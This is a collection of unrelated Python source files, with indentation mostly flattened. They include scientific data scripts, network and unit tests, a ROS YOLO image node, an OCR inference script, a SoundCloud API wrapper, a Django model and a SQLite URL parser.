newcfile = "sac_"+fname
pypsutils.string2file(filestring,os.path.join(path,newcfile))
newsources.append(newcfile)
#create symlink .h file
hpath = os.path.join(path,driver.hfile)
if not os.path.exists(hpath):
shutil.copy(pypsutils.get_runtimefile(driver.hfile,"sac"),hpath)
makefile,others = super(C,self).generate(path,newsources,cppflags,ldflags)
return makefile,others+newsources+[driver.hfile]
return C
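# A minimal usage sketch for the SAC workspace above (hedged: "kernel.c", the module
# name "main" and the module-access syntax are illustrative; the exact pyps entry
# points depend on the surrounding PIPS installation):
#
#   import sac
#   ws = sac.workspace("kernel.c", driver="avx")
#   ws.fun.main.sac(verbose=True)      # the per-module sac() transformation patched in above
#   files, headers = ws.save("out")    # writes SIMD.h / patterns.h next to the generated code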
|
from tornado.web import url
from . import views
patterns = [
url(r'^/$', views.IndexView, name='index')
]
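# Hedged sketch of how this pattern list is typically wired into a tornado application
# (assumes views.IndexView is a RequestHandler subclass; port and module layout are illustrative):
#
#   from tornado.web import Application
#   app = Application(patterns)
#   app.listen(8888)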
|
import json
import logging
from http.server import BaseHTTPRequestHandler, HTTPServer
from eth_utils import to_bytes, to_hex
from raiden.utils import sha3
# The code below simulates XUD resolver functionality.
# It should only be used for testing and must not be used at
# runtime or in production.
def resolve(request):
preimage = None
x_secret = "0x2ff886d47b156de00d4cad5d8c332706692b5b572adfe35e6d2f65e92906806e"
x_secret_hash = to_hex(sha3(to_bytes(hexstr=x_secret)))
if request["secret_hash"] == x_secret_hash:
preimage = {"secret": x_secret}
return preimage
def serve():
class SimpleHTTPRequestHandler(BaseHTTPRequestHandler):
def do_POST(self):
try:
content_len = int(self.headers.get("Content-Length"))
body = self.rfile.read(content_len)
preimage = resolve(json.loads(body.decode("utf8")))
if preimage is None:
self.send_response(404)
self.end_headers()
else:
response = to_bytes(text=json.dumps(preimage))
self.send_response(200)
self.end_headers()
self.wfile.write(response)
except BaseException:
self.send_response(400)
self.end_headers()
httpd = HTTPServer(("localhost", 8000), SimpleHTTPRequestHandler)
httpd.serve_forever()
if __name__ == "__main__":
logging.basicConfig()
serve()
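# Hedged usage sketch: a client for the test resolver above (assumes `serve()` is already
# running in another process on localhost:8000 and that the `requests` package is available;
# the secret is the one hard-coded in `resolve`):
#
#   import requests
#   secret = "0x2ff886d47b156de00d4cad5d8c332706692b5b572adfe35e6d2f65e92906806e"
#   secret_hash = to_hex(sha3(to_bytes(hexstr=secret)))
#   r = requests.post("http://localhost:8000", json={"secret_hash": secret_hash})
#   print(r.status_code, r.json() if r.status_code == 200 else None)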
|
from collections import defaultdict
import json
'''
Convert ensembl ids to entrez ids. Delete duplicated and invalid (NA) ones.
'''
with open('./data/entrez_ids_original_HI-II-14.txt') as f:
ids = defaultdict(list)
for line in f.readlines():
num, ensembl, entrez = line[:-1].split()
ids[ensembl].append(entrez)
keys = list(ids.keys())
for k in keys:
if 'NA' in ids[k]:
del ids[k]
keys = sorted(list(ids.keys()))
ent = []
for i in range(len(keys)):
# ent.append("\t".join([str(i), keys[i], ids[keys[i]][0]]))
ent.append(ids[keys[i]][0])
with open('./data/entrez_ids_HI-II-14.txt', 'w') as f:  # this file contains no duplicates
    f.write("\n".join(ent))
with open('./data/ensembl-entrez_HI-II-14.json','w') as f:  # this file contains duplicates; they are handled during extraction
json.dump(ids, f)
'''
# confirm there are no duplicates
for k in ids:
if len(set(ids[k])) != len(ids[k]):
print(k)
'''
'''
# find ensembl ids that map to multiple entrez ids
for k in ids:
if len(ids[k])>1:
print(k, len(ids[k]))
# results
ENSG00000076928 2
ENSG00000105793 2
ENSG00000120341 2
ENSG00000120709 2
ENSG00000124713 2
ENSG00000137843 2
ENSG00000137936 2
ENSG00000143702 2
ENSG00000145979 2
ENSG00000146112 2
ENSG00000158301 2
ENSG00000158747 2
ENSG00000163156 2
ENSG00000166272 2
ENSG00000178882 2
ENSG00000181135 2
ENSG00000188629 2
ENSG00000196605 2
ENSG00000204209 2
ENSG00000205571 2
ENSG00000214026 2
ENSG00000215269 5
ENSG00000224659 2
ENSG00000236362 7
ENSG00000268606 2
ENSG00000276070 2
'''
'''
# find ensembl ids without an entrez id
for k in ids:
if 'NA' in ids[k]:
print(k, ids[k])
# results
ENSG00000064489 ['NA']
ENSG00000158483 ['NA']
ENSG00000171570 ['NA']
ENSG00000183889 ['NA']
ENSG00000213204 ['NA']
ENSG00000233024 ['NA']
ENSG00000255104 ['NA']
ENSG00000257390 ['NA']
ENSG00000259288 ['NA']
ENSG00000259529 ['NA']
ENSG00000268173 ['NA']
ENSG00000268500 ['NA']
ENSG00000270136 ['NA']
ENSG00000272617 ['NA']
ENSG00000284341 ['NA']
'''
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from distutils.core import setup, Extension
# define the extension module
cos_module = Extension('cos_module', sources=['cos_module.c'])
# run the setup
setup(ext_modules=[cos_module])
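# Hedged note: with this setup.py, the C extension is typically built in place and then
# imported directly, e.g.:
#
#   python setup.py build_ext --inplace
#   python -c "import cos_module; print(cos_module.cos_func(0.0))"
#
# (`cos_func` is an assumed name for whatever function cos_module.c actually exports.)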
|
"""
Wrapper interface for dispatching calculations of auxiliary variables to the
correct functions depending on the data source a given dataset originated from.
"""
import xarray as xr
class MissingDomainData(Exception):
pass
from .era5.interpolation import interpolate_to_height_levels as era5_hl_interp
from .era5.interpolation import interpolate_to_pressure_levels as era5_pl_interp
from .era5.aux_variables import calc_variable as era5_calc
def calc_auxiliary_variable(ds, v, **kwargs):
"""
Given the dataset `ds` calculate the auxiliary variable `v`
"""
data_source = ds.attrs.get("data_source")
if data_source is None:
        raise Exception(
            "Please define an attribute `data_source` on your domain data dataset"
            " so that the correct method for calculating auxiliary variables can"
            " be used (e.g. `ds.attrs['data_source'] = 'era5'`)"
        )
if data_source == "era5":
return era5_calc(ds=ds, var=v, **kwargs)
else:
raise NotImplementedError(
f"No method to calculate `{v}` for `{data_source}` has been implemented"
)
def interpolate_to_height_levels(ds, height):
"""
    Some source data will not be defined on "height levels" (i.e. the vertical
coordinate represents values at the same height in meters), but instead
might use a hybrid or pressure grid. This function calls the relevant
interpolation routines to ensure the domain data exists on height levels.
`height` is assumed to be in meters
"""
data_source = ds.attrs.get("data_source")
if data_source is None:
        raise Exception(
            "Please define an attribute `data_source` on your domain data dataset"
            " so that the correct method for transforming to height levels can"
            " be used (e.g. `ds.attrs['data_source'] = 'era5'`)"
        )
if data_source == "era5":
ds_hl = era5_hl_interp(ds_model_levels=ds, height=height)
else:
        raise NotImplementedError(
            f"No method to interpolate domain data to height levels for"
            f" `{data_source}` has been implemented"
        )
ds_hl.attrs["data_source"] = ds.attrs.get("data_source")
# test to ensure that correct coords with attrs has been set
if isinstance(height, xr.DataArray):
ds_hl["level"] = height
return ds_hl
def interpolate_to_pressure_levels(ds, pressure):
"""
    Some source data will not be defined on "pressure levels" (i.e. the vertical
    coordinate represents values at the same pressure), but instead
    might use a hybrid or height-based grid. This function calls the relevant
    interpolation routines to ensure the domain data exists on pressure levels.
"""
data_source = ds.attrs.get("data_source")
if data_source is None:
        raise Exception(
            "Please define an attribute `data_source` on your domain data dataset"
            " so that the correct method for transforming to pressure levels can"
            " be used (e.g. `ds.attrs['data_source'] = 'era5'`)"
        )
if data_source == "era5":
ds_pl = era5_pl_interp(ds_model_levels=ds, pressure=pressure)
else:
        raise NotImplementedError(
            f"No method to interpolate domain data to pressure levels for"
            f" `{data_source}` has been implemented"
        )
ds_pl.attrs["data_source"] = ds.attrs.get("data_source")
# test to ensure that correct coords with attrs has been set
if isinstance(pressure, xr.DataArray):
ds_pl["level"] = pressure
return ds_pl
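# Hedged usage sketch for the dispatch functions above (illustrative only; it assumes an
# ERA5 dataset loaded elsewhere and that "qv" is a variable the era5 backend can derive):
#
#   ds = xr.open_dataset("era5_domain.nc")      # hypothetical input file
#   ds.attrs["data_source"] = "era5"
#   qv = calc_auxiliary_variable(ds, v="qv")
#   ds_hl = interpolate_to_height_levels(ds, height=xr.DataArray([100.0, 500.0], dims="level"))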
|
#!/usr/bin/env python
#
# Copyright (c) 2019, The OpenThread Authors.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import time
import wpan
from wpan import verify
#-----------------------------------------------------------------------------------------------------------------------
# Test description:
#
# This test covers the situation for SED child (re)attaching to a parent with multiple IPv6 addresses present on the
# child.
test_name = __file__[:-3] if __file__.endswith('.py') else __file__
print('-' * 120)
print("Starting '{}'".format(test_name))
#-----------------------------------------------------------------------------------------------------------------------
# Utility functions
def verify_address(node_list, prefix):
"""
This function verifies that all nodes in the `node_list` contain an IPv6 address with the given `prefix`.
"""
for node in node_list:
all_addrs = wpan.parse_list(node.get(wpan.WPAN_IP6_ALL_ADDRESSES))
verify(any([addr.startswith(prefix[:-1]) for addr in all_addrs]))
#-----------------------------------------------------------------------------------------------------------------------
# Creating `wpan.Nodes` instances
speedup = 4
wpan.Node.set_time_speedup_factor(speedup)
parent = wpan.Node()
child = wpan.Node()
#-----------------------------------------------------------------------------------------------------------------------
# Init all nodes
wpan.Node.init_all_nodes()
#-----------------------------------------------------------------------------------------------------------------------
# Build network topology
parent.form('addr-test')
child.join_node(parent, node_type=wpan.JOIN_TYPE_SLEEPY_END_DEVICE)
child.set(wpan.WPAN_POLL_INTERVAL, '200')
all_nodes = [parent, child]
#-----------------------------------------------------------------------------------------------------------------------
# Test implementation
WAIT_TIME = 5
CHILD_SUPERVISION_CHECK_TIMEOUT = 1
prefix1 = 'fd00:1::'
prefix2 = 'fd00:2::'
prefix3 = 'fd00:3::'
prefix4 = 'fd00:4::'
# Add 4 prefixes (all with SLAAC bit set).
parent.add_prefix(prefix1, on_mesh=True, slaac=True, configure=True)
parent.add_prefix(prefix2, on_mesh=True, slaac=True, configure=True)
parent.add_prefix(prefix3, on_mesh=True, slaac=True, configure=True)
parent.add_prefix(prefix4, on_mesh=True, slaac=True, configure=True)
# Verify that the sleepy child gets all 4 SLAAC addresses.
def check_addresses_on_child():
verify_address([child], prefix1)
verify_address([child], prefix2)
verify_address([child], prefix3)
verify_address([child], prefix4)
wpan.verify_within(check_addresses_on_child, WAIT_TIME)
# Enable white-listing on parent.
parent.set(wpan.WPAN_MAC_WHITELIST_ENABLED, '1')
# Enable supervision check on the child; this ensures the child is detached soon.
child.set(wpan.WPAN_CHILD_SUPERVISION_CHECK_TIMEOUT, str(CHILD_SUPERVISION_CHECK_TIMEOUT))
# Wait for child to get detached.
def check_child_is_detached():
verify(not child.is_associated())
wpan.verify_within(check_child_is_detached, WAIT_TIME)
# Now reset parent and wait for it to be associated.
parent.reset()
def check_parent_is_associated():
verify(parent.is_associated())
wpan.verify_within(check_parent_is_associated, WAIT_TIME)
# Now verify that child is indeed getting attached back.
def check_child_is_associated():
verify(child.is_associated())
wpan.verify_within(check_child_is_associated, WAIT_TIME)
# And finally, check that we see all the child addresses in the parent's child table.
def check_child_addresses_on_parent():
child_addrs = parent.get(wpan.WPAN_THREAD_CHILD_TABLE_ADDRESSES)
verify(child_addrs.find(prefix1) > 0)
verify(child_addrs.find(prefix2) > 0)
verify(child_addrs.find(prefix3) > 0)
verify(child_addrs.find(prefix4) > 0)
wpan.verify_within(check_child_addresses_on_parent, WAIT_TIME)
#-----------------------------------------------------------------------------------------------------------------------
# Test finished
wpan.Node.finalize_all_nodes()
print("'{}' passed.".format(test_name))
|
from jupyter_client.managerabc import *
|
from .ipfs import *
|
from contextlib import suppress
from typing import Union, List
from requests.models import Response
from pysoundcloud.soundclouddata import SoundCloudData
from pysoundcloud.soundclouduser import SoundCloudUser
from pysoundcloud.soundcloudtrack import SoundCloudTrack
from pysoundcloud.soundcloudplaylist import SoundCloudPlaylist
class SoundCloudSearchResults:
response_json: dict = dict()
response_content: str = ""
url: str = ""
total_results: int = 0
next_href: str = ""
results: List[Union[SoundCloudUser, SoundCloudTrack, SoundCloudPlaylist]] = list()
"""
:var response_json: The json dict from the response
:var response_content: The str content from the response
    :var url: The URL of the search request
:var total_results: The total number of results for the search query
:var next_href: The link to the next page of results
:var results: All the results for the search query
"""
def __init__(self, response: Response, client_id: str = None, parent: "pysoundcloud.client.Client" = None) -> None:
"""
:param response: The requests response
:param client_id: The ID of the client
:param parent:
"""
self.response_json = response.json()
self.response_content = response.content.decode("utf-8")
        self.url = response.url
        self.results = []  # avoid sharing the class-level mutable default across instances
        self.total_results = self.response_json["total_results"]
with suppress(KeyError):
self.next_href = self.response_json["next_href"]
for i in range(len(self.response_json["collection"])):
kind = self.response_json["collection"][i]["kind"]
if (kind == "user"):
self.results.append(SoundCloudUser(self.response_json["collection"][i],
client_id))
elif (kind == "track"):
self.results.append(SoundCloudTrack(self.response_json["collection"][i],
client_id, parent=parent))
elif (kind == "playlist"):
self.results.append(SoundCloudPlaylist(self.response_json["collection"][i],
client_id))
else:
print(self.response_json["collection"][i]["kind"])
def __getitem__(self, item):
return self.results[item]
|
s = input()
print("x"*len(s))
|
from typing import TYPE_CHECKING, Any, get_args
import numpy
from openff.units import unit
class _FloatQuantityMeta(type):
def __getitem__(self, t):
return type("FloatQuantity", (FloatQuantity,), {"__unit__": t})
class FloatQuantity(float, metaclass=_FloatQuantityMeta):
@classmethod
def __get_validators__(cls):
yield cls.validate_type
@classmethod
def validate_type(cls, val):
if isinstance(val, float):
return val
expected_unit = unit.Unit(getattr(cls, "__unit__", Any))
if isinstance(val, unit.Quantity):
return val.to(expected_unit)
raise NotImplementedError()
class ArrayQuantityMeta(type):
def __getitem__(self, t):
return type("ArrayQuantity", (ArrayQuantity,), {"__unit__": t})
class ArrayQuantity(float, metaclass=ArrayQuantityMeta):
@classmethod
def __get_validators__(cls):
yield cls.validate_type
@classmethod
def validate_type(cls, val):
if isinstance(val, list):
val = numpy.array(val)
if isinstance(val, numpy.ndarray):
return val
unit_type = get_args(getattr(cls, "__unit__"))[0]
expected_unit = unit.Unit(unit_type)
if isinstance(val, unit.Quantity):
val = val.to(expected_unit).magnitude
assert isinstance(
val, numpy.ndarray
), f"invalid inner type of {type(val)}, expected a numpy array."
return val
raise NotImplementedError()
if TYPE_CHECKING:
FloatQuantity = float
ArrayQuantity = numpy.ndarray
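# Hedged illustration of how these annotation helpers behave (assumes the openff-units
# registry resolves "angstrom"; not part of this module's public API):
#
#   LengthQuantity = FloatQuantity["angstrom"]
#   LengthQuantity.validate_type(2.0)                              # plain floats pass through
#   LengthQuantity.validate_type(unit.Quantity(1.0, "nanometer"))  # converted to angstrom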
|
import unittest
from firetower import redis_util
from firetower.category import Category, TimeSeries
def create_mock_category(id, sig, thresh, name):
"""Create a mock category object for testing purposes.
Args:
        id: str, system reference (hash when not a test obj).
sig: str, the signature we're matching against.
thresh: float, what ratio will match sig.
name: str, human-readable name.
"""
cat = Category(
redis_util.MockRedis(share_state=False),
cat_id=id)
cat._set_signature(sig)
cat._set_threshold(thresh)
cat._set_human(name)
return cat
class TestCategory(unittest.TestCase):
def setUp(self):
self.r = redis_util.MockRedis(share_state=False)
self.cat_id = "blah"
self.cat_sig = "database"
self.cat_thresh = 0.7
        self.cat_name = "The usual"
self.cat = create_mock_category(
self.cat_id,
self.cat_sig,
self.cat_thresh,
self.cat_name)
def test_category_create(self):
cat = Category.create(self.r, "new test category")
self.assertEqual(cat.signature, "new test category")
self.assertTrue(cat.cat_id)
def test_meta(self):
"""Test meta get/set methods"""
details = [
("signature", self.cat_sig, "new_cat_sig"),
("human_name", self.cat_name, "new_cat_name"),
("threshold", self.cat_thresh, 0.7)
]
for meta_name, old_value, new_value in details:
self.assertEqual(getattr(self.cat, meta_name), old_value)
self.set_meta(meta_name, new_value)
self.assertEqual(getattr(self.cat, meta_name), new_value)
def test_non_float_threshold(self):
self.set_meta("threshold", "banana")
def get_thresh():
return self.cat.threshold
self.assertRaises(ValueError, get_thresh)
def test_get_all_cats(self):
new_ids = ["foo", "bar", "baz"]
for new_id in new_ids:
self.r.hset(
Category.CAT_META_HASH,
"%s:signature" % (new_id), self.cat_sig
)
cats = Category.get_all_categories(self.r)
self.assertEqual(len(cats), len(new_ids) + 1)
for cat in cats:
self.assertEqual(cat.signature, self.cat_sig)
class TestTimeSeries(unittest.TestCase):
def add_ts(self, ts, count, cat_id=None):
if not cat_id:
cat_id = self.cat_id
self.r.zadd(
"ts_%s" % self.cat_id, TimeSeries.generate_ts_value(ts, count), ts
)
def setUp(self):
self.r = redis_util.MockRedis(share_state=False)
self.cat_id = "foobar"
self.time_series = TimeSeries(self.r, self.cat_id)
def test_get_all(self):
start_ts = 100
expected_counts = [1, 2, 3]
for i, count in enumerate(expected_counts):
self.add_ts(start_ts+i, count)
ts_list = self.time_series.all()
self.assertEqual(len(ts_list), len(expected_counts))
for ts, count in ts_list:
self.assertTrue(count in expected_counts)
def test_get_range(self):
for count, ts in enumerate(range(100, 120)):
self.add_ts(ts, count)
ts_list = self.time_series.range(110, 115)
self.assertEqual(len(ts_list), 6)
if __name__ == '__main__':
unittest.main()
|
print('welcome')
|
#! /usr/bin/env python
import clg
import os
import yaml
import yamlordereddictloader
CMD_FILE = os.path.abspath(os.path.join(os.path.dirname(__file__),'subparsers.yml'))
def main():
cmd = clg.CommandLine(yaml.load(open(CMD_FILE),
Loader=yamlordereddictloader.Loader))
print(cmd.parse())
if __name__ == '__main__':
main()
|
#!/usr/bin/env python
#!coding=utf-8
import rospy
import numpy as np
import PIL.Image as pilimage
from sensor_msgs.msg import CompressedImage
from sensor_msgs.msg import Image
from cv_bridge import CvBridge, CvBridgeError
import cv2
import time
from yolo import YOLO
yolo = YOLO()
class image_converter:
def __init__(self):
        # Create the cv_bridge and declare the image publisher and subscriber
#self.image_pub = rospy.Publisher("cv_bridge_image", Image, queue_size=1)
#self.image_pub = rospy.Publisher("cv_bridge_image", MultiArrayLayout, queue_size=1)
self.bridge = CvBridge()
self.image_sub = rospy.Subscriber("/mid_camera/color/image_raw/compressed", CompressedImage, self.callback)
def callback(self,data):
        # Use cv_bridge to convert the ROS image message into an OpenCV image
try:
cv_image = self.bridge.compressed_imgmsg_to_cv2(data, "bgr8")
except CvBridgeError as e:
            print(e)
cv_image = cv2.cvtColor(cv_image,cv2.COLOR_BGR2RGB)
cv_image = pilimage.fromarray(np.uint8(cv_image))
cv_image, bbox_list, label_list = yolo.detect_image(cv_image)
cv_image = np.array(cv_image)
cv_image = cv2.cvtColor(cv_image,cv2.COLOR_RGB2BGR)
cv2.imshow("Image window", cv_image)
cv2.waitKey(3)
        # Convert the OpenCV-format data back into a ROS Image message and publish it
#try:
# self.image_pub.publish(self.bridge.cv2_to_imgmsg(cv_image, "bgr8"))
#self.image_pub.publish(self.bridge.cv2_to_imgmsg(bbox_list, MultiArrayLayout))
#except CvBridgeError as e:
# print('e')
if __name__ == '__main__':
try:
        # Initialize the ROS node
rospy.init_node("cv_bridge_test")
rospy.loginfo("Starting cv_bridge_test node")
image_converter()
rospy.spin()
except KeyboardInterrupt:
print("Shutting down cv_bridge_test node.")
cv2.destroyAllWindows()
|
#!/usr/bin/python
# -*-coding: utf-8 -*-
# Copyright 2010 Google Inc.
# Licensed under the Apache License, Version 2.0
# http://www.apache.org/licenses/LICENSE-2.0
# Google's Python Class
# http://code.google.com/edu/languages/google-python-class/
import os
import re
import sys
import urllib
"""Logpuzzle exercise
Given an apache logfile, find the puzzle urls and download the images.
Here's what a puzzle url looks like:
10.254.254.28 - - [06/Aug/2007:00:13:48 -0700] "GET /~foo/puzzle-bar-aaab.jpg HTTP/1.0" 302 528 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
"""
def myFunction(link_part):
return link_part.split('-')[2].split('.')[0]
def read_urls(filename):
"""Returns a list of the puzzle urls from the given log file, extracting the hostname from the filename itself.
Screens out duplicate urls and returns the urls sorted into increasing order."""
# +++your code here+++
f = open(filename,'r')
page = f.read()
f.close()
raw_urls = re.findall('GET \S*?(/images/puzzle\S*?) HTTP', page) # \S matches any non-space character
raw_urls = list(set(raw_urls))
raw_urls = sorted(raw_urls, key=myFunction)
urls = []
for link in raw_urls:
urls.append('https://developers.google.com/edu/python' + link)
# https://developers.google.com/edu/python/images/puzzle/a-baaa.jpg
    #print(len(urls)) # Note: len(urls) when selecting for 'puzzle': 20; when selecting for '\.jpg': 20
return urls
def download_images(img_urls, dest_dir):
"""Given the urls already in the correct order, downloads each image into the given directory.
Gives the images local filenames img0, img1, and so on.
Creates an index.html in the directory with an img tag to show each local image file.
Creates the directory if necessary.
"""
# +++your code here+++
    # Check whether the given directory already exists; if not, create it.
    print('Created dir?')
    print(dest_dir)
    if not os.path.exists(dest_dir):
        os.makedirs(dest_dir)
        print('yes')
    else:
        print('no')
f_out = open(dest_dir + '/index.html', 'w')
f_out.writelines(['<html>\n','<body>\n'])
counter = 0
for link in img_urls:
urllib.urlretrieve(link, dest_dir + '/img' + str(counter))
f_out.write(' <img src="img' + str(counter) + '">\n')
counter += 1
f_out.writelines(['</body>\n','</html>'])
f_out.close()
return
def main():
args = sys.argv[1:]
if not args:
print('usage: [--todir dir] logfile ')
sys.exit(1)
todir = ''
if args[0] == '--todir':
todir = args[1]
del args[0:2]
img_urls = read_urls(args[0])
if todir:
download_images(img_urls, todir)
else:
print('\n'.join(img_urls))
if __name__ == '__main__':
main()
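# Hedged example invocation (the script and log filenames are illustrative):
#
#   python logpuzzle.py --todir ./puzzle_images place_code.google.com.log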
|
from mmocr.datasets import build_dataset
from mmcv import Config
from mmocr.apis import init_detector, model_inference
import os
from opencc import OpenCC
import cv2
import numpy as np
cc = OpenCC('s2t') # convert from Simplified Chinese to Traditional Chinese
path = os.path.join("work_dir", "order_imgs")
print(len(os.listdir(path)))
checkpoint = "./work_dir/sar_r31_parallel_decoder_chineseocr_20210507-b4be8214.pth"
config_file = "configs/textrecog/sar/sar_r31_parallel_decoder_chinese.py"
model = init_detector(config_file, checkpoint, device="cuda:0")
for index, i in enumerate(os.listdir(path)):
yolov5_output_dir = os.path.join(path, i)
ocr_result = ""
a = os.listdir(yolov5_output_dir)
a.sort()
for split_img in a:
#print(os.path.join(yolov5_output_dir, split_img))
img = cv2.imread(os.path.join(yolov5_output_dir, split_img))
#img = np.expand_dims(img, axis = 2)
img = cv2.resize(img, (128, 128))
"""
s = []
t = []
rotate_array = [90, 0, -90]
for i in range(3):
(h, w, d) = img.shape # 讀取圖片大小
center = (w // 2, h // 2) # 找到圖片中心
# 第一個參數旋轉中心,第二個參數旋轉角度(-順時針/+逆時針),第三個參數縮放比例
M = cv2.getRotationMatrix2D(center, rotate_array[i], 1.0)
# 第三個參數變化後的圖片大小
img = cv2.warpAffine(img, M, (w, h))
result = model_inference(model, img)
print(result)
s.append(result["score"])
t.append(result["text"])
print(np.argmax(s))
converted = cc.convert(t[np.argmax(s)])
"""
result = model_inference(model, img)
converted = cc.convert(result["text"])
if "/" in converted:
converted = converted.replace("/", "")
result["text"] = converted[0]
ocr_result += result["text"]
os.rename(yolov5_output_dir, yolov5_output_dir+"_"+ocr_result)
print(str(index) + "/" + str(len(os.listdir(path))))
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Jul 11 15:10:16 2020
@author: yujiang
"""
import datetime
def hello_world(param=2):
"""
    this is to test how to use sphinx.ext.autodoc
    :param param: (int) just a test parameter (default is 2)
    :return: (str) hello world time str
"""
today = datetime.date.today()
to_string = "hello world to {} in {}".format(param, today)
print(to_string)
return to_string
|
from django.db import models
from eworkshop.utils.models import TimeModel
class Profile(TimeModel):
"""Profile Model.
    A profile holds user statistics and a profile picture.
"""
staff = models.OneToOneField('staff.Staff', on_delete=models.CASCADE)
picture = models.ImageField(
'profile picture',
upload_to='staff/pictures',
blank=True,
default='/images/avatar.jpg',
null=True
)
is_password_changed = models.BooleanField(default=False)
def __str__(self):
return self.staff.first_name
|
# Mine content from url_kb.sqlite3
################################################################################
# Import statements
################################################################################
import hashlib
import json
import logging
import pdb
import os
import sqlite3
# import random
# import threading
# import time
import uuid
from urlparse import urlparse
from datetime import datetime
#from helpers.app_helpers import *
################################################################################
# Setup logging configuration
################################################################################
logging_format = '%(asctime)-15s %(levelname)-8s %(message)s'
#logging_format = '%(asctime)-15s %(levelname)-8s %(module)-16s %(funcName)-24s %(message)s'
logging.basicConfig(filename='url-kb-mine.log', level=logging.DEBUG, format=logging_format) # Log to file
console_logger = logging.StreamHandler() # Log to console as well
console_logger.setFormatter(logging.Formatter(logging_format))
logging.getLogger().addHandler(console_logger)
########################################
# Define agnostic functions
########################################
def get_appconfig(repo_root_path):
app_config_filename = 'app_config.json'
app_config_filepath = os.path.join(repo_root_path, app_config_filename)
logging.debug("Opening file {0}".format(app_config_filename))
appconfig_file = open( app_config_filepath )
logging.debug("Loading file {0}".format(app_config_filename))
appconfig = json.load( appconfig_file )
logging.debug("app_config loaded")
return appconfig
################################################################################
# Variables dependent on Application basic functions
################################################################################
repo_root_path = os.path.dirname(os.getcwd())
appconfig = get_appconfig(repo_root_path)
SQLITE_FILENAME = os.path.join(repo_root_path, appconfig["url_dump"]["sqlite3_filename"])
AUTH_COOKIE_NAME = str(appconfig['application']["auth_cookie_name"])
# ZX: Trying a different approach
# keywords = {
# "SQLITE_FILENAME" : appconfig["url_dump"]["sqlite3_filename"],
# "AUTH_COOKIE_NAME" : str(appconfig['application']["auth_cookie_name"]),
# }
# const = lambda kw : keywords[kw]
################################################################################
# Constants
################################################################################
# SQLITE_FILENAME = appconfig["url_dump"]["sqlite3_filename"]
# AUTH_COOKIE_NAME = str(appconfig['application']["auth_cookie_name"])
################################################################################
# Classes
################################################################################
# N/A
################################################################################
# Functions
################################################################################
# N/A
def initialize_sqlite_db(sqlite_filename):
"""Initialize a sqlite3 database
Table(s) created:
1. raw_url
Args:
N/A
Returns:
N/A
"""
logging.info("[url_dump] - Ensuring existence of sqlite3 database [{0}]".format(sqlite_filename))
# Create directory if not exists
dirName = os.path.dirname(sqlite_filename)
if not os.path.isdir(dirName):
os.makedirs(dirName)
#create_raw_url_tabl(sqlite_filename)
def create_parsed_url_table(sqlite_filename):
"""Initialize a sqlite3 database
Tables created:
1. parsed_url
Args:
N/A
Returns:
N/A
"""
# Create any tables that we might need here
    # ZX: Remember there are only 5 data types in Sqlite3: text, numeric, integer, real, blob
with sqlite3.connect(sqlite_filename) as conn:
cursor = conn.cursor()
cursor.execute('''CREATE TABLE IF NOT EXISTS parsed_url (
hexdigest text,
scheme text,
netloc text,
path text,
params text,
query text,
fragment text,
count integer,
timestamp text,
status integer,
PRIMARY KEY (hexdigest)
)''')
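# Hedged note on the schema assumed by process_raw_url() below: the raw_url table is created
# elsewhere (see the commented-out create_raw_url_tabl call above), and rows are read
# positionally (row[0] = Id, row[2] = url), so a layout roughly like the following is implied
# (column names beyond Id/timestamp/url/status are guesses):
#
#   CREATE TABLE IF NOT EXISTS raw_url (
#       Id        INTEGER PRIMARY KEY,
#       timestamp TEXT,
#       url       TEXT,
#       status    INTEGER
#   );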
def process_raw_url(sqlite_filename):
timestamp = datetime.utcnow()
with sqlite3.connect(SQLITE_FILENAME) as conn:
raw_url_cursor = conn.cursor()
exec_cursor = conn.cursor()
# res = cursor.execute(
# "INSERT OR REPLACE INTO raw_url (timestamp, url, status) VALUES (?, ?, ?)",
# (timestamp, url, status)
# )
# Fetch all at one go
# cursor.execute("SELECT * FROM raw_url")
# rec = cursor.fetchall()
# Fetching one-by-one treating cursor as iterator
for row in raw_url_cursor.execute("SELECT * FROM raw_url WHERE Status = 0"):
print(row)
# raw_url_cursor.execute("SELECT * FROM raw_url")
# row = raw_url_cursor.fetchone()
md5_hash = hashlib.md5(row[2]).hexdigest()
parsed_res = urlparse(row[2])
rowhex_count = 0
exec_cursor.execute("SELECT * FROM parsed_url WHERE hexdigest = ?", (md5_hash,))
rec = exec_cursor.fetchone()
if rec is not None:
rowhex_count = rec[7]
rowhex_count = rowhex_count + 1
res = exec_cursor.execute(
"INSERT OR REPLACE INTO parsed_url (hexdigest, scheme, netloc, path, params, query, fragment, count, timestamp, status) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?)",
(md5_hash, parsed_res.scheme, parsed_res.netloc, parsed_res.path, parsed_res.params, parsed_res.query, parsed_res.fragment, rowhex_count, timestamp, 0)
)
res = exec_cursor.execute(
"UPDATE raw_url SET status = 1 WHERE Id = ?",
(row[0],)
)
